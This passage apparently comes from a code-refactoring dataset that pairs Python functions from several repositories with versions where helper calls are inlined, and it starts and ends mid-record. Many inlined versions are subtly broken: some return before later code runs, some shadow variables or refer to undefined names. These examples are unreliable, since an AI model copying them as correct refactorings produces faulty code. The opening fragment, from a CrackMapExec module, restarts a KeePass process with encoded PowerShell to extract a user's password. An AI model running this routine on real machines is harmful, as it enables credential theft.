if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
elif self.action == 'ALL':
context.log.highlight('')
self.add_trigger(context, connection)
context.log.highlight('')
self.restart(context, connection)
self.poll(context, connection)
context.log.highlight('')
context.log.info('Cleaning everything..')
self.clean(context, connection)
self.restart(context, connection)
context.log.highlight('')
context.log.info('Extracting password..')
self.extract_password(context)
|
CrackMapExec
|
positive
|
def decrypt(token, *, context, ttl=None):
<DeepExtract>
label = force_bytes(b'crypt', strings_only=True)
context = force_bytes(context, strings_only=True)
key = _derive_urlsafe_key(label=label, context=context)
</DeepExtract>
f = Fernet(key=key)
try:
ret = (f.extract_timestamp(token), f.decrypt(token, ttl=ttl))
metrics.get('desecapi_key_decryption_success').labels(context).inc()
return ret
except InvalidToken:
raise ValueError
|
def decrypt(token, *, context, ttl=None):
label = force_bytes(b'crypt', strings_only=True)
context = force_bytes(context, strings_only=True)
key = _derive_urlsafe_key(label=label, context=context)
f = Fernet(key=key)
try:
ret = (f.extract_timestamp(token), f.decrypt(token, ttl=ttl))
metrics.get('desecapi_key_decryption_success').labels(context).inc()
return ret
except InvalidToken:
raise ValueError
|
desec-stack
|
positive
|
def add_comment_text(self, text):
"""Add or extend the node's comment.
If the node doesn't have a C property, adds one with the specified
text.
Otherwise, adds the specified text to the existing C property value
(with two newlines in front).
"""
if self.has_property(b'C'):
<DeepExtract>
self._set_raw_list(b'C', self._presenter.serialise(b'C', self.get(b'C') + b'\n\n' + text))
</DeepExtract>
else:
<DeepExtract>
self._set_raw_list(b'C', self._presenter.serialise(b'C', text))
</DeepExtract>
|
def add_comment_text(self, text):
"""Add or extend the node's comment.
If the node doesn't have a C property, adds one with the specified
text.
Otherwise, adds the specified text to the existing C property value
(with two newlines in front).
"""
if self.has_property(b'C'):
self._set_raw_list(b'C', self._presenter.serialise(b'C', self.get(b'C') + b'\n\n' + text))
else:
self._set_raw_list(b'C', self._presenter.serialise(b'C', text))
|
betago
|
positive
|
def get_subdirs_number(path):
"""
Checks the number of subdirectories, and returns it. Useful for automatic
output folders generation.
"""
if not os.path.exists(path):
return 0
<DeepExtract>
subdirectories = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path, name))]
</DeepExtract>
return len(subdirectories)
|
def get_subdirs_number(path):
"""
Checks the number of subdirectories, and returns it. Useful for automatic
output folders generation.
"""
if not os.path.exists(path):
return 0
subdirectories = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path, name))]
return len(subdirectories)
|
Copycat-abstractive-opinion-summarizer
|
positive
|
def expected_resp(self, state):
data = super().expected_resp(state)
<DeepExtract>
data['wallets'] = [state['wallet']['id']]
data['notifications'] = [state['notification']['id']]
</DeepExtract>
data['user_id'] = state['user']['id']
return data
|
def expected_resp(self, state):
data = super().expected_resp(state)
data['wallets'] = [state['wallet']['id']]
data['notifications'] = [state['notification']['id']]
data['user_id'] = state['user']['id']
return data
|
bitcart
|
positive
|
def _add_rule_node_dependencies(rule_node):
if sequence_graph.has_node(rule_node):
return
sequence_graph.add_node(rule_node)
for out_edge in reverse_graph.out_edges_iter([rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
<DeepExtract>
if sequence_graph.has_node(out_rule_node):
return
sequence_graph.add_node(out_rule_node)
for out_edge in reverse_graph.out_edges_iter([out_rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
_add_rule_node_dependencies(out_rule_node)
sequence_graph.add_edge(out_rule_node, out_rule_node)
</DeepExtract>
sequence_graph.add_edge(rule_node, out_rule_node)
|
def _add_rule_node_dependencies(rule_node):
if sequence_graph.has_node(rule_node):
return
sequence_graph.add_node(rule_node)
for out_edge in reverse_graph.out_edges_iter([rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
if sequence_graph.has_node(out_rule_node):
return
sequence_graph.add_node(out_rule_node)
for out_edge in reverse_graph.out_edges_iter([out_rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
_add_rule_node_dependencies(out_rule_node)
sequence_graph.add_edge(out_rule_node, out_rule_node)
sequence_graph.add_edge(rule_node, out_rule_node)
|
anvil-build
|
positive
|
def add_ordering(self, *ordering, **kwargs):
for field_name in ordering:
if isinstance(field_name, six.string_types) and field_name != '?':
if field_name.startswith('-'):
field_name = field_name[1:]
<DeepExtract>
property_ref = resolve_queryable_property(self.model, QueryPath(field_name))[0]
if not property_ref:
return None
if full_group_by is None:
full_group_by = bool(ANNOTATION_TO_AGGREGATE_ATTRIBUTES_MAP) and (not self.select)
with self._add_queryable_property_annotation(property_ref, full_group_by) as annotation:
return annotation
</DeepExtract>
return super(QueryablePropertiesQueryMixin, self).add_ordering(*ordering, **kwargs)
|
def add_ordering(self, *ordering, **kwargs):
for field_name in ordering:
if isinstance(field_name, six.string_types) and field_name != '?':
if field_name.startswith('-'):
field_name = field_name[1:]
property_ref = resolve_queryable_property(self.model, QueryPath(field_name))[0]
if not property_ref:
return None
if full_group_by is None:
full_group_by = bool(ANNOTATION_TO_AGGREGATE_ATTRIBUTES_MAP) and (not self.select)
with self._add_queryable_property_annotation(property_ref, full_group_by) as annotation:
return annotation
return super(QueryablePropertiesQueryMixin, self).add_ordering(*ordering, **kwargs)
|
django-queryable-properties
|
positive
|
def get_IPv4s(self):
"""
Return all known IPv4 addresses of this container. It may be possible
that the container has disabled networking: in that case, the list is
empty
:return: list of str
"""
<DeepExtract>
inspect_data = self.inspect(refresh=True)
inspect_to_container_metadata(self.metadata, inspect_data, self.image)
return self.metadata
</DeepExtract>
return self.metadata.ipv4_addresses
|
def get_IPv4s(self):
"""
Return all known IPv4 addresses of this container. It may be possible
that the container has disabled networking: in that case, the list is
empty
:return: list of str
"""
inspect_data = self.inspect(refresh=True)
inspect_to_container_metadata(self.metadata, inspect_data, self.image)
return self.metadata
return self.metadata.ipv4_addresses
|
conu
|
positive
|
def _process_work_order_sync(self, process_wo_id):
"""
Process the work-order of the specified work-order id
and return the response. Used for synchronous execution.
Parameters:
@param process_wo_id - Id of the work-order that is to be processed
"""
logger.info('About to process work orders found in wo-worker-scheduled table.')
wo_id = self._kv_helper.csv_match_pop('wo-worker-scheduled', self._worker_id, process_wo_id)
if process_wo_id == wo_id:
<DeepExtract>
try:
wo_json_req = self._kv_helper.get('wo-requests', wo_id)
if wo_json_req is None:
logger.error('Received empty work order corresponding ' + 'to id %s from wo-requests table', wo_id)
wo_process_result = None
except Exception as e:
logger.error('Problem while reading the work order %s from wo-requests table', wo_id)
wo_process_result = None
logger.info('Validating JSON workorder request %s', wo_id)
if not self._validate_request(wo_id, wo_json_req):
wo_process_result = None
self._kv_helper.set('wo-worker-processing', self._identity, wo_id)
logger.info('Workorder %s picked up for processing by %s', wo_id, self._identity)
logger.info('Execute workorder with id %s', wo_id)
wo_json_resp = self._execute_work_order(wo_json_req)
wo_resp = json.loads(wo_json_resp)
logger.info('Update workorder receipt for workorder %s', wo_id)
self._wo_kv_delegate.update_receipt(wo_id, wo_resp)
if 'error' in wo_resp and wo_resp['error']['code'] == WorkOrderStatus.FAILED:
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.FAILED, wo_json_resp)
wo_process_result = None
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.SUCCESS, wo_json_resp)
wo_process_result = wo_resp
</DeepExtract>
self._kv_helper.remove('wo-worker-processing', self._identity)
return wo_process_result
else:
return None
logger.info('No more worker orders in wo-worker-scheduled table.')
|
def _process_work_order_sync(self, process_wo_id):
"""
Process the work-order of the specified work-order id
and return the response. Used for synchronous execution.
Parameters:
@param process_wo_id - Id of the work-order that is to be processed
"""
logger.info('About to process work orders found in wo-worker-scheduled table.')
wo_id = self._kv_helper.csv_match_pop('wo-worker-scheduled', self._worker_id, process_wo_id)
if process_wo_id == wo_id:
try:
wo_json_req = self._kv_helper.get('wo-requests', wo_id)
if wo_json_req is None:
logger.error('Received empty work order corresponding ' + 'to id %s from wo-requests table', wo_id)
wo_process_result = None
except Exception as e:
logger.error('Problem while reading the work order %s from wo-requests table', wo_id)
wo_process_result = None
logger.info('Validating JSON workorder request %s', wo_id)
if not self._validate_request(wo_id, wo_json_req):
wo_process_result = None
self._kv_helper.set('wo-worker-processing', self._identity, wo_id)
logger.info('Workorder %s picked up for processing by %s', wo_id, self._identity)
logger.info('Execute workorder with id %s', wo_id)
wo_json_resp = self._execute_work_order(wo_json_req)
wo_resp = json.loads(wo_json_resp)
logger.info('Update workorder receipt for workorder %s', wo_id)
self._wo_kv_delegate.update_receipt(wo_id, wo_resp)
if 'error' in wo_resp and wo_resp['error']['code'] == WorkOrderStatus.FAILED:
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.FAILED, wo_json_resp)
wo_process_result = None
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.SUCCESS, wo_json_resp)
wo_process_result = wo_resp
self._kv_helper.remove('wo-worker-processing', self._identity)
return wo_process_result
else:
return None
logger.info('No more worker orders in wo-worker-scheduled table.')
|
avalon
|
positive
|
def _consume_to_next_section(self) -> List[str]:
<DeepExtract>
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and (not line):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
</DeepExtract>
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
|
def _consume_to_next_section(self) -> List[str]:
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and (not line):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
|
cotk
|
positive
|
def _make_noargs(self):
<DeepExtract>
idlflags = []
if self._isdual:
idlflags.append(dispid(self._m.memid))
idlflags.extend(self._m.idlflags)
else:
idlflags.extend(self._m.idlflags)
if __debug__ and self._m.doc:
idlflags.insert(1, helpstring(self._m.doc))
type_name = self._to_type_name(self._m.returns)
elms = (idlflags, type_name, self._m.name)
</DeepExtract>
code = " COMMETHOD(%r, %s, '%s')," % elms
if len(code) > 80:
code = " COMMETHOD(\n %r,\n %s,\n '%s',\n )," % elms
print(code, file=self._stream)
|
def _make_noargs(self):
idlflags = []
if self._isdual:
idlflags.append(dispid(self._m.memid))
idlflags.extend(self._m.idlflags)
else:
idlflags.extend(self._m.idlflags)
if __debug__ and self._m.doc:
idlflags.insert(1, helpstring(self._m.doc))
type_name = self._to_type_name(self._m.returns)
elms = (idlflags, type_name, self._m.name)
code = " COMMETHOD(%r, %s, '%s')," % elms
if len(code) > 80:
code = " COMMETHOD(\n %r,\n %s,\n '%s',\n )," % elms
print(code, file=self._stream)
|
comtypes
|
positive
|
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
<DeepExtract>
self.form_obj = self.view_form(**self.get_form_datas())
</DeepExtract>
<DeepExtract>
helper = self.get_form_helper()
if helper:
self.form_obj.helper = helper
</DeepExtract>
return self.get_response()
|
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
self.form_obj = self.view_form(**self.get_form_datas())
helper = self.get_form_helper()
if helper:
self.form_obj.helper = helper
return self.get_response()
|
devops
|
positive
|
def testAtrousFullyConvolutionalUnknownHeightWidth(self):
batch = 2
(height, width) = (65, 65)
global_pool = False
output_stride = 8
<DeepExtract>
if None in [batch, None, None, 3]:
inputs = tf.placeholder(tf.float32, (batch, None, None, 3))
else:
inputs = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(None), [None, 1]) + np.reshape(np.arange(None), [1, None]), [1, None, None, 1]), [batch, 1, 1, 3]))
</DeepExtract>
with slim.arg_scope(resnet_utils.resnet_arg_scope()):
<DeepExtract>
block = resnet_v1.resnet_v1_block
blocks = [block('block1', base_depth=1, num_units=3, stride=2), block('block2', base_depth=2, num_units=3, stride=2), block('block3', base_depth=4, num_units=3, stride=2), block('block4', base_depth=8, num_units=2, stride=1)]
(output, _) = resnet_v1.resnet_v1(inputs, blocks, None, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope)
</DeepExtract>
self.assertListEqual(output.get_shape().as_list(), [batch, None, None, 32])
<DeepExtract>
if None in [batch, height, width, 3]:
images = tf.placeholder(tf.float32, (batch, height, width, 3))
else:
images = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(height), [height, 1]) + np.reshape(np.arange(width), [1, width]), [1, height, width, 1]), [batch, 1, 1, 3]))
</DeepExtract>
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
output = sess.run(output, {inputs: images.eval()})
self.assertEqual(output.shape, (batch, 9, 9, 32))
|
def testAtrousFullyConvolutionalUnknownHeightWidth(self):
batch = 2
(height, width) = (65, 65)
global_pool = False
output_stride = 8
if None in [batch, None, None, 3]:
inputs = tf.placeholder(tf.float32, (batch, None, None, 3))
else:
inputs = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(None), [None, 1]) + np.reshape(np.arange(None), [1, None]), [1, None, None, 1]), [batch, 1, 1, 3]))
with slim.arg_scope(resnet_utils.resnet_arg_scope()):
block = resnet_v1.resnet_v1_block
blocks = [block('block1', base_depth=1, num_units=3, stride=2), block('block2', base_depth=2, num_units=3, stride=2), block('block3', base_depth=4, num_units=3, stride=2), block('block4', base_depth=8, num_units=2, stride=1)]
(output, _) = resnet_v1.resnet_v1(inputs, blocks, None, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope)
self.assertListEqual(output.get_shape().as_list(), [batch, None, None, 32])
if None in [batch, height, width, 3]:
images = tf.placeholder(tf.float32, (batch, height, width, 3))
else:
images = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(height), [height, 1]) + np.reshape(np.arange(width), [1, width]), [1, height, width, 1]), [batch, 1, 1, 3]))
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
output = sess.run(output, {inputs: images.eval()})
self.assertEqual(output.shape, (batch, 9, 9, 32))
|
CVTron
|
positive
|
def terminate_job(self, pid, sig=None):
<DeepExtract>
(proc, _) = next(((proc, i) for (i, proc) in enumerate(self.processes) if proc.pid == pid), (None, None))
</DeepExtract>
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
|
def terminate_job(self, pid, sig=None):
(proc, _) = next(((proc, i) for (i, proc) in enumerate(self.processes) if proc.pid == pid), (None, None))
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
|
billiard
|
positive
|
def test_close(self):
s = self.SELECTOR()
self.addCleanup(s.close)
<DeepExtract>
(rd, wr) = socketpair()
self.addCleanup(rd.close)
self.addCleanup(wr.close)
(rd, wr) = (rd, wr)
</DeepExtract>
s.register(rd, EVENT_READ)
s.register(wr, EVENT_WRITE)
s.close()
self.assertRaises(KeyError, s.get_key, rd)
self.assertRaises(KeyError, s.get_key, wr)
|
def test_close(self):
s = self.SELECTOR()
self.addCleanup(s.close)
(rd, wr) = socketpair()
self.addCleanup(rd.close)
self.addCleanup(wr.close)
(rd, wr) = (rd, wr)
s.register(rd, EVENT_READ)
s.register(wr, EVENT_WRITE)
s.close()
self.assertRaises(KeyError, s.get_key, rd)
self.assertRaises(KeyError, s.get_key, wr)
|
aiozmq
|
positive
|
def searchPath(self, start, end, path=[]):
path = path + [start]
if start == end:
return path
if start not in self.d:
return None
for node in self.d[start]:
if node not in path:
<DeepExtract>
path = path + [node]
if node == end:
newpath = path
if node not in self.d:
newpath = None
for node in self.d[node]:
if node not in path:
newpath = self.searchPath(node, end, path)
if newpath:
newpath = newpath
newpath = None
</DeepExtract>
if newpath:
return newpath
return None
|
def searchPath(self, start, end, path=[]):
path = path + [start]
if start == end:
return path
if start not in self.d:
return None
for node in self.d[start]:
if node not in path:
path = path + [node]
if node == end:
newpath = path
if node not in self.d:
newpath = None
for node in self.d[node]:
if node not in path:
newpath = self.searchPath(node, end, path)
if newpath:
newpath = newpath
newpath = None
if newpath:
return newpath
return None
|
cosa-nostra
|
positive
|
def get_species_files(self, species, outdir):
<DeepExtract>
species_dict = {x.text.rstrip(): x for x in self.xml_tree.getroot().findall('species')}
if species not in species_dict:
raise Error('Error! Species "' + species + '" not found. Cannot continue. Available species:\n' + '\n'.join(sorted(list(species_dict.keys()))))
try:
profile_url = species_dict[species].find('mlst').find('database').find('profiles').find('url').text
except:
raise Error('Error getting profile url for species ' + species + '. Cannot continue')
locus_list = species_dict[species].find('mlst').find('database').find('loci').findall('locus')
fasta_urls = [x.find('url').text for x in locus_list]
if len(fasta_urls) == 0:
raise Error('Error! No fasta files found for species ' + species + '. Cannot continue')
(profile_url, fasta_urls) = (profile_url, fasta_urls)
</DeepExtract>
<DeepExtract>
try:
os.mkdir(outdir)
except:
raise Error('Error mkdir ' + outdir)
profile_outfile = os.path.join(outdir, 'profile.txt')
self._download_file(profile_url, profile_outfile)
for fasta_url in fasta_urls:
outfile = '{0}.tfa'.format(os.path.join(outdir, fasta_url.split('/')[-2]))
self._download_file(fasta_url, outfile + '.tmp')
PubmlstGetter._rename_seqs_in_fasta(outfile + '.tmp', outfile)
os.unlink(outfile + '.tmp')
</DeepExtract>
|
def get_species_files(self, species, outdir):
species_dict = {x.text.rstrip(): x for x in self.xml_tree.getroot().findall('species')}
if species not in species_dict:
raise Error('Error! Species "' + species + '" not found. Cannot continue. Available species:\n' + '\n'.join(sorted(list(species_dict.keys()))))
try:
profile_url = species_dict[species].find('mlst').find('database').find('profiles').find('url').text
except:
raise Error('Error getting profile url for species ' + species + '. Cannot continue')
locus_list = species_dict[species].find('mlst').find('database').find('loci').findall('locus')
fasta_urls = [x.find('url').text for x in locus_list]
if len(fasta_urls) == 0:
raise Error('Error! No fasta files found for species ' + species + '. Cannot continue')
(profile_url, fasta_urls) = (profile_url, fasta_urls)
try:
os.mkdir(outdir)
except:
raise Error('Error mkdir ' + outdir)
profile_outfile = os.path.join(outdir, 'profile.txt')
self._download_file(profile_url, profile_outfile)
for fasta_url in fasta_urls:
outfile = '{0}.tfa'.format(os.path.join(outdir, fasta_url.split('/')[-2]))
self._download_file(fasta_url, outfile + '.tmp')
PubmlstGetter._rename_seqs_in_fasta(outfile + '.tmp', outfile)
os.unlink(outfile + '.tmp')
|
ariba
|
positive
|
def init_optimizer(self, kvstore='local', optimizer='sgd', optimizer_params=(('learning_rate', 0.01),), force_init=False):
"""Install and initialize optimizers.
Parameters
----------
kvstore : str or KVStore
Default `'local'`.
optimizer : str or Optimizer
Default `'sgd'`
optimizer_params : dict
Default `(('learning_rate', 0.01),)`. The default value is not a dictionary,
just to avoid pylint warning of dangerous default values.
force_init : bool
Default `False`, indicating whether we should force re-initializing the
optimizer in the case an optimizer is already installed.
"""
assert self.binded and self.params_initialized
if self.optimizer_initialized and (not force_init):
self.logger.warning('optimizer already initialized, ignoring...')
return
(kvstore, update_on_kvstore) = _create_kvstore(kvstore, len(self._context), self._arg_params)
batch_size = self._exec_group.batch_size
if kvstore and 'dist' in kvstore.type and ('_sync' in kvstore.type):
batch_size *= kvstore.num_workers
rescale_grad = 1.0 / batch_size
if isinstance(optimizer, str):
idx2name = {}
if update_on_kvstore:
idx2name.update(enumerate(self._exec_group.param_names))
else:
for k in range(len(self._context)):
idx2name.update({i * len(self._context) + k: n for (i, n) in enumerate(self._exec_group.param_names)})
optimizer_params = dict(optimizer_params)
if 'rescale_grad' not in optimizer_params:
optimizer_params['rescale_grad'] = rescale_grad
optimizer = opt.create(optimizer, sym=self.symbol, param_idx2name=idx2name, **optimizer_params)
else:
assert isinstance(optimizer, opt.Optimizer)
if optimizer.rescale_grad != rescale_grad:
warnings.warn('Optimizer created manually outside Module but rescale_grad ' + 'is not normalized to 1.0/batch_size/num_workers (%s vs. %s). ' % (optimizer.rescale_grad, rescale_grad) + 'Is this intended?', stacklevel=2)
self._optimizer = optimizer
self._kvstore = kvstore
self._update_on_kvstore = update_on_kvstore
self._updater = None
if kvstore:
_initialize_kvstore(kvstore=kvstore, param_arrays=self._exec_group.param_arrays, arg_params=self._arg_params, param_names=self._param_names, update_on_kvstore=update_on_kvstore)
if update_on_kvstore:
kvstore.set_optimizer(self._optimizer)
else:
self._updater = opt.get_updater(optimizer)
self.optimizer_initialized = True
if self._preload_opt_states is not None:
<DeepExtract>
assert self.optimizer_initialized
if self._update_on_kvstore:
self._kvstore.load_optimizer_states(self._preload_opt_states)
else:
self._updater.set_states(open(self._preload_opt_states, 'rb').read())
</DeepExtract>
self._preload_opt_states = None
|
def init_optimizer(self, kvstore='local', optimizer='sgd', optimizer_params=(('learning_rate', 0.01),), force_init=False):
"""Install and initialize optimizers.
Parameters
----------
kvstore : str or KVStore
Default `'local'`.
optimizer : str or Optimizer
Default `'sgd'`
optimizer_params : dict
Default `(('learning_rate', 0.01),)`. The default value is not a dictionary,
just to avoid pylint warning of dangerous default values.
force_init : bool
Default `False`, indicating whether we should force re-initializing the
optimizer in the case an optimizer is already installed.
"""
assert self.binded and self.params_initialized
if self.optimizer_initialized and (not force_init):
self.logger.warning('optimizer already initialized, ignoring...')
return
(kvstore, update_on_kvstore) = _create_kvstore(kvstore, len(self._context), self._arg_params)
batch_size = self._exec_group.batch_size
if kvstore and 'dist' in kvstore.type and ('_sync' in kvstore.type):
batch_size *= kvstore.num_workers
rescale_grad = 1.0 / batch_size
if isinstance(optimizer, str):
idx2name = {}
if update_on_kvstore:
idx2name.update(enumerate(self._exec_group.param_names))
else:
for k in range(len(self._context)):
idx2name.update({i * len(self._context) + k: n for (i, n) in enumerate(self._exec_group.param_names)})
optimizer_params = dict(optimizer_params)
if 'rescale_grad' not in optimizer_params:
optimizer_params['rescale_grad'] = rescale_grad
optimizer = opt.create(optimizer, sym=self.symbol, param_idx2name=idx2name, **optimizer_params)
else:
assert isinstance(optimizer, opt.Optimizer)
if optimizer.rescale_grad != rescale_grad:
warnings.warn('Optimizer created manually outside Module but rescale_grad ' + 'is not normalized to 1.0/batch_size/num_workers (%s vs. %s). ' % (optimizer.rescale_grad, rescale_grad) + 'Is this intended?', stacklevel=2)
self._optimizer = optimizer
self._kvstore = kvstore
self._update_on_kvstore = update_on_kvstore
self._updater = None
if kvstore:
_initialize_kvstore(kvstore=kvstore, param_arrays=self._exec_group.param_arrays, arg_params=self._arg_params, param_names=self._param_names, update_on_kvstore=update_on_kvstore)
if update_on_kvstore:
kvstore.set_optimizer(self._optimizer)
else:
self._updater = opt.get_updater(optimizer)
self.optimizer_initialized = True
if self._preload_opt_states is not None:
assert self.optimizer_initialized
if self._update_on_kvstore:
self._kvstore.load_optimizer_states(self._preload_opt_states)
else:
self._updater.set_states(open(self._preload_opt_states, 'rb').read())
self._preload_opt_states = None
|
Deformable-ConvNets
|
positive
|
def get_mask(path):
if type(path) != str:
mask = np.zeros(IMAGE_SIZE)
else:
<DeepExtract>
with rasterio.open(path) as src:
img = src.read().transpose((1, 2, 0))
seg = np.array(img, dtype=int)
mask = seg[:, :, 0]
</DeepExtract>
return np.array(mask, dtype=np.uint8)
|
def get_mask(path):
if type(path) != str:
mask = np.zeros(IMAGE_SIZE)
else:
with rasterio.open(path) as src:
img = src.read().transpose((1, 2, 0))
seg = np.array(img, dtype=int)
mask = seg[:, :, 0]
return np.array(mask, dtype=np.uint8)
|
activefire
|
positive
|
def _threshold_and_support(input, dim=0):
"""Sparsemax building block: compute the threshold
Args:
input: any dimension
dim: dimension along which to apply the sparsemax
Returns:
the threshold value
"""
(input_srt, _) = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
<DeepExtract>
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
rhos = rho.view(view).transpose(0, dim)
</DeepExtract>
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return (tau, support_size)
|
def _threshold_and_support(input, dim=0):
"""Sparsemax building block: compute the threshold
Args:
input: any dimension
dim: dimension along which to apply the sparsemax
Returns:
the threshold value
"""
(input_srt, _) = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
rhos = rho.view(view).transpose(0, dim)
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return (tau, support_size)
|
encoder-agnostic-adaptation
|
positive
|
def run_search(target_parameter_count, create_model_func: Callable[[int], nn.Module], lower: int, upper: int):
if lower == upper:
return lower
mid = int(math.floor((lower + upper) / 2))
<DeepExtract>
mid_count = sum((p.numel() for p in create_model_func(mid).parameters() if p.requires_grad))
</DeepExtract>
if mid_count == target_parameter_count:
return mid
elif mid_count > target_parameter_count:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=lower, upper=mid)
else:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=mid + 1, upper=upper)
|
def run_search(target_parameter_count, create_model_func: Callable[[int], nn.Module], lower: int, upper: int):
if lower == upper:
return lower
mid = int(math.floor((lower + upper) / 2))
mid_count = sum((p.numel() for p in create_model_func(mid).parameters() if p.requires_grad))
if mid_count == target_parameter_count:
return mid
elif mid_count > target_parameter_count:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=lower, upper=mid)
else:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=mid + 1, upper=upper)
|
cordial-sync
|
positive
|
def train_joint():
nlg_loss = nlu_loss = 0
nlg_loss_gen = nlu_loss_gen = 0
batch_amount = 0
nlu_scorer = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlu_scorer_gen = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlg_scorer = SequenceScorer()
nlg_scorer_gen = SequenceScorer()
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer)
pbar = tqdm(zip(self.train_nlg_data_loader, self.train_nlu_data_loader), total=len(self.train_nlg_data_loader), dynamic_ncols=True)
for (batch_nlg, batch_nlu) in pbar:
<DeepExtract>
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer_gen)
(encoder_input, decoder_label, refs, sf_data) = batch_nlg
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, nlg_joint_prob, last_reward) = self.run_nlg_batch(batch_nlg, criterion_nlg, scorer=nlg_scorer, testing=False, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, retain_graph=True, optimize=False, beam_size=mid_sample_size, nlg_st=nlg_st, supervised=primal_supervised, reinforce=primal_reinforce)
generated_batch = [batch_decode_result, encoder_input, refs, sf_data]
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, _, _, _) = self.run_nlu_batch_dual(generated_batch, criterion_nlu, scorer=nlu_scorer_gen, joint_prob_other=nlg_joint_prob if mid_sample_size > 1 else None, max_norm=max_norm, last_reward=last_reward, sample_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
</DeepExtract>
nlg_loss += batch_loss_nlg
nlu_loss_gen += batch_loss_nlu
<DeepExtract>
criterion_nlg.set_scorer(nlg_scorer_gen)
criterion_nlu.set_scorer(nlu_scorer)
(encoder_input, decoder_label, refs, sf_data) = batch_nlu
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, samples, nlu_joint_prob, last_reward) = self.run_nlu_batch(batch_nlu, criterion_nlu, scorer=nlu_scorer, testing=False, max_norm=max_norm, retain_graph=True, optimize=False, sample_size=mid_sample_size, supervised=primal_supervised, reinforce=primal_reinforce)
if nlu_st:
generated_batch = [samples, encoder_input, refs, sf_data]
else:
generated_batch = [self._st_sigmoid(batch_logits, hard=False).unsqueeze(1).expand(-1, mid_sample_size, -1), encoder_input, refs, sf_data]
self.nlg_batches += 1
